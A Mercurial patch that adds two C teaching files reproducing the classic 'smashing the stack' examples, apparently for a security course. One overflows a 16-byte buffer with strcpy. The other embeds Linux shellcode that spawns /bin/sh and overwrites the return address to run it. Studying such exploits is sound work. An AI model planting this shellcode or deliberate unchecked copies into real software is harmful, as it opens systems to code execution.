# HG changeset patch # User Christian Urban # Date 1412431646 -3600 # Node ID 17852f5397fdd19faa43219109d7758c3a75bfd3 # Parent 20af800ce73677db208a029a6455a2f5b920ea79 added original smashing for fun files diff -r 20af800ce736 -r 17852f5397fd progs/example2.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/example2.c Sat Oct 04 15:07:26 2014 +0100 @@ -0,0 +1,16 @@ +void function(char *str) { + char buffer[16]; + + strcpy(buffer,str); +} + +void main() { + char large_string[256]; + int i; + + for( i = 0; i < 255; i++) + large_string[i] = 'A'; + + function(large_string); +} + diff -r 20af800ce736 -r 17852f5397fd progs/overflow.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/overflow.c Sat Oct 04 15:07:26 2014 +0100 @@ -0,0 +1,20 @@ +char shellcode[] = + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" + "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" + "\x80\xe8\xdc\xff\xff\xff/bin/sh"; + +char large_string[128]; + +void main() { + char buffer[96]; + int i; + long *long_ptr = (long *) large_string; + + for (i = 0; i < 32; i++) + *(long_ptr + i) = (int) buffer; + + for (i = 0; i < strlen(shellcode); i++) + large_string[i] = shellcode[i]; + + strcpy(buffer,large_string); +}